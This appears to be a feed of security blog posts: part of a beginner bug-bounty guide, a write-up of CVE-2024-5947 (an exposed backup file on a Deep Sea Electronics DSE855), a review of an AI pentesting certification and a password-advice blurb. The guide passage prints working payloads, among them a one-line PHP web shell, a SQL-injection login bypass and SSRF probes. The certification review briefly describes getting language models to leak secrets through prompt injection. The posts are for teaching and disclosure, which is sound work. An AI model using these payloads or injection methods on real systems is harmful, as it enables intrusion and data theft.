Observe: Click the search button and observe if an alert box pops up.Verify and Report: If the script executes, it indicates an XSS vulnerability. Write a report detailing the affected URL, the payload used, and the impact.Scenario 2: Exploiting RCE via File UploadStep-by-Step Example:Locate File Upload Functionality: Find a section of the application that allows file uploads, such as an avatar or document upload feature.Prepare Malicious File: Create a PHP file with the following content:<?php system($_GET[''cmd'']); ?>Upload the File: Upload the PHP file to the server.Access the File: Visit the file via URL, e.g., http://example.com/uploads/malicious.php?cmd=ls, to execute a command.Verify Execution: If you see the output of the command, the server is vulnerable to RCE. Report the issue with details on the file upload process and the commands executed.Scenario 3: Exploiting SSRF via URL ParameterStep-by-Step Example:Find URL Parameter: Look for a URL parameter in the application that accepts user input, such as a URL fetching feature.Inject Internal URLs: Enter URLs like http://localhost/admin or http://127.0.0.1 in the parameter.Check Responses: Observe if the application returns information from the internal URL or service.Report the Vulnerability: Document the URL parameter, the injected payloads, and the responses.Scenario 4: SQL Injection in Login FormStep-by-Step Example:Locate Login Form: Find the login form on the target website.Inject SQL Payload: Enter admin'' OR ''1''=''1 as both username and password.Submit the Form: Click login and see if you gain unauthorized access.Document and Report: If successful, report the SQL injection with details on the payload and its effect.Links and ResourcesLearning Platforms and TutorialsHacker101: Hacker101 — Free Online Security TrainingPortSwigger Web Security Academy: Learn Web Security for FreeBugcrowd University: Free Bug Bounty TrainingOWASP (Open Web Application Security Project): OWASP ResourcesPractice PlatformsHack The Box: Hack The Box — Practice CybersecurityTryHackMe: TryHackMe — Learn CybersecurityVulnHub: VulnHub — Vulnerable By DesignCTFtime: Capture The Flag EventsBug Bounty Programs and PlatformsHackerOne: HackerOne — Bug Bounty PlatformBugcrowd: Bugcrowd — Find and Report BugsSynack: Synack — Managed Bug BountyCobalt: Cobalt — Pentesting as a ServiceTools and ResourcesBurp Suite: Burp Suite — Web Vulnerability ScannerOWASP ZAP (Zed Attack Proxy): OWASP ZAP — Free Security ScannerNmap: Nmap — Network ScannerNikto: Nikto — Web Server ScannerLearning and CommunityThe Hacker News: Stay Updated on Security NewsKrebs on Security: Krebs on Security BlogReddit — NetSec: NetSec SubredditTwitter — Follow Security Experts: List of Security Experts on TwitterDocumentation and ReportingExploit-DB: Exploit Database — Exploits and VulnerabilitiesCVE Details: CVE Details — Vulnerability DatabaseSecurity Focus: Security Focus — Vulnerability DatabaseConclusionBug bounty hunting is like a fun treasure hunt for finding security flaws on the web. It’s exciting and can be super rewarding if you play by the rules, keep good notes, and use your tools wisely. Imagine yourself as a superhero saving the day, but instead of a cape, you’ve got a keyboard. Keep your adventures ethical, document your discoveries like a treasure map, and use automation as your trusty sidekick, not your only tool. Happy hunting, and may you find bugs that are as elusive as a needle in a haystack! 🚀💻🔍For further learning and practice:Bug Bounty Tutorials: Hacker101CTF Platforms: Hack The Box, TryHackMeCybersecurity Blogs: The Hacker News, Krebs on SecurityHappy hunting, and may your bug bounty journey be both rewarding and educational!Thank you for reading, and happy hunting! 🚀💻🔍— SubhamHow to Get Started in Bug Bounty Hunting: A Comprehensive Beginner’s Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Recently, during a routine security assessment, I uncovered a significant flaw in the Deep Sea Electronics DSE855 device. This vulnerability, identified as CVE-2024–5947, pertains to an authentication bypass issue that allows unauthorized access to sensitive information. Here’s how I discovered and explored this vulnerability.The DiscoveryWhile examining the target, I focused on the device’s web-based interface and noticed a peculiar behavior. The Deep Sea Electronics DSE855 was exposing a configuration backup file at http://xxxxxxxxxx/Backup.bin. This file was accessible without any authentication, raising red flags.Understanding the VulnerabilityBug Name: Deep Sea Electronics DSE855 — Authentication BypassBug Priority: MediumVulnerable URL: http://xxxxxxx/Backup.binCVE Description:CVE-2024–5947 highlights a critical issue in the Deep Sea Electronics DSE855’s configuration backup process. The vulnerability arises from a lack of authentication before accessing sensitive information stored in the backup file. This issue, documented as ZDI-CAN-22679, allows network-adjacent attackers to retrieve the backup file without proper authorization, potentially exposing sensitive data such as stored credentials.ImpactThe exposed backup file can contain sensitive configuration details that could be leveraged by an attacker to compromise the system further. Accessing this file could lead to unauthorized disclosure of credentials and other critical information, increasing the risk of a security breach.Steps to ReproduceTo confirm the vulnerability, follow these steps:Access the Vulnerable URL: Open the URL in your browser: http://xxxxxxxxx/Backup.binObserve the File Access: If the backup file is accessible without any authentication, you can view or download its contents, confirming the vulnerability.Automating the HuntTo streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:ToolPOC: CVE-2024–5947on githubpip install CVE-2024-5947CVE-2024-5947 --chatid <YourTelegramChatID>To Check a Single URL:CVE-2024-5947 -u http://mytargetprogram.comTo Check a List of URLs:CVE-2024-5947 -i urls.txtRemediation:To mitigate this vulnerability, it is essential to remove the .bin file from the server and ensure that sensitive files are protected with proper authentication mechanisms.POC by: @karthithehackerMail: contact@karthithehacker.comWebsite: https://www.karthithehacker.com/If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.For enrolling my cybersecurity and Bugbounty course,WhatsApp +91 82709 13635.Connect with me:Twitter: https://twitter.com/karthithehackerInstagram: https://www.instagram.com/karthithehacker/LinkedIn: https://www.linkedin.com/in/karthikeyan--v/Website: https://www.karthithehacker.com/Github : https://github.com/karthi-the-hacker/npmjs: https://www.npmjs.com/~karthithehackerYoutube: https://www.youtube.com/@karthi_the_hackerThank youKarthikeyan.VThe Discovery of CVE-2024–5947: Authentication Bypass in Deep Sea Electronics DSE855 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Skynet better watch out…My hard fought cert…Before this week, I didn’t even know this existed. I have been casually looking around for any way to certify that I have acquired a certain set of skills in hacking generative AI and LLM apps, to no avail.Then, one day I was casually scrolling my LinkedIn feed and I came across this:Certified AI/ML Pentester (C-AI/MLPen) - ReviewLo and behold, The SecOps Group launched this certification back in July! I jumped on it immediately. That 80% discount, on a £250.00 base price ($328.25USD and $66USD when discounted), was too good to pass up. I had to buy a voucher.It’s also notable that you get one free retake and your voucher is for life with each purchase.The Preparation“But Kelvin,” you say, “What type of prep work did you do if you just heard about the certification this week?”Well, I’ve basically spent most of 2024 learning how to:Get LLMs to leak sensitive dataDirectly and indirectly inject malicious instructions within promptsCome up with my own (admittedly a bit outdated now) proof-of-concept attacks on LLMsBut for someone who hasn’t spent the better part of 2024 trying to prevent the takeover of Skynet, where would they go to prepare?Full disclosure, as of this writing (August 30, 2024), The SecOps Group does not offer any formal training for this exam. They offer mock exams for many of their practical pentesting exams, but it wasn’t yet available for the C-AL/MLPen exam before I decided to go for it.(Edit: As of 3rd of Sept, 2024, the mock exam for the C-AI/MLPen is now available.)Thankfully, they don’t leave you hanging, because the promo page tells you everything you need to know:Pictured: No lies.They also link you a whole host of pertinent resources. In my honest opinion, the single best resource is Lakera AI’s Gandalf. However, you will be ill prepared if you don’t read and understand the very many other resources they link, and test various attacks across different LLMs and configurations.If you have the time, inclination, and ability, I’d also recommend engineering your own AI chatbot(s) to test various offensive and defensive techniques. Part of my AI-related studies this year were in engineering various generative AI tools and services to better understand them. I acquired Microsoft’s AI-900 and have even been studying (off-and-on) for the AI-102 exam. I truly believe this has helped me tremendously.If you know how to connect your AI to a database, you know how to access that database, and thus intuitively know how to get it to leak that database…The ExamWhat I like most about this exam is that it’s 100% practical.The C-AI/MLPen is essentially a CTF where you’re given access to 8 different AI models and you take the fictional role of an application pentester tasked with testing each models’ defenses. Each has it’s own unique configuration, and each will require different approaches to coax their corresponding flag. You will be using real exploits and malicious payloads.While there are technically “questions” that you have to answer, the “answers” are the flags you get from getting the different LLMs to divulge their secret, Gandalf-style.When you first buy a voucher you’re given a VPN file to access the exam environment. I had one brief moment where I had to disconnect and reconnect to the VPN to regain access to the exam environment, but otherwise it was very stable.The total exam time is 4 hours and 15 minutes, which is fair for what they’re asking from you. It’s points based, and you need at least a 60% to pass. Essentially, as long as you get 6 of 8 total flags, you have a high chance of passing. I was able to capture 6 flags early but I was unable to get the final couple and eventually my exam time ran out. Thankfully, this was still enough to pass.I should call out that I think I broke one of the AI models to the point that it couldn’t give me the flag even if it wanted to. Without going into too much detail, after a certain point, its output was just… wrong and went well beyond hallucination. While I wasn’t able to retrieve a flag, it was showing me things that I probably shouldn’t have been seeing.I should also call out that even though I said Lakera AI’s Gandalf is the single best resource for exam takers, the exam itself is by no means as easy as Gandalf. The C-AI/MLPen exam is much, much more difficult.For example, I’ve done Gandalf at various times over the past few months, and I have always been able to casually get through the flags without much effort. For C-AI/MLPen, none of my usual exploit attempts worked and I had to dig deep and research furiously to come up with solutions.ConclusionWould I recommend that anyone interested take this exam?Yes!For the price alone, there is very little reason to pass it up. It’s also certainly worth it for the challenge.Probably my only negative, and I’ll admit is a bit nitpicky, is the abbreviation of the certification, C-AI/MLPen. It’s a bit much. I’d honestly recommend that The SecOps Group shortens it to “CAIP” or “CAIPen” if they want to keep their usual naming scheme. As someone with several certifications already, I’m trying to reduce the amount of alphabet soup in my email signature.(Edit: To explain it better, our email and LinkedIn DM signatures are prime real estate. I’m entering mid-career, and I have six IT/cybersecurity certifications right now. I’m a firm believer in only showing five at a time, maximum, but preferably only three or four. So I basically choose which ones I want to advertise with each email and DM I send to people. Each message I send is free advertising for both me (showing off my knowledge/skills) and the cert body (piquing interest in a certification from potential exam takers). The longer the certification’s name, the less likely I’ll want to add it to my signature, and I’m not alone in that sentiment. From a cert body’s perspective, you want as many people showing off your credentials as possible.)Will this certification get your resume passed job candidate ATS or HR managers’ scrutiny? Most likely not. It’s barely a month old, and our industry is slow to widely adopt newer certifications.However, there is precious little competition right now in this space for AI pentesting certifications. As far as I’m aware, this is your only way of certifying your skills, outside of sharing your proof-of-concepts on GitHub or getting CVEs attributed to you. Having this in your back pocket can be a great talking point during an interview.If you’re a web app pentester, AI engineer, or anything IT or cybersecurity-related I feel it would be worth it to give this your time.Thanks for reading!Certified AI/ML Pentester (C-AI/MLPen) Review was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Here''s what the experts recommend when you need to create a new password -- and one rule likely goes against what you''re made to do at work.

by ZDNET Security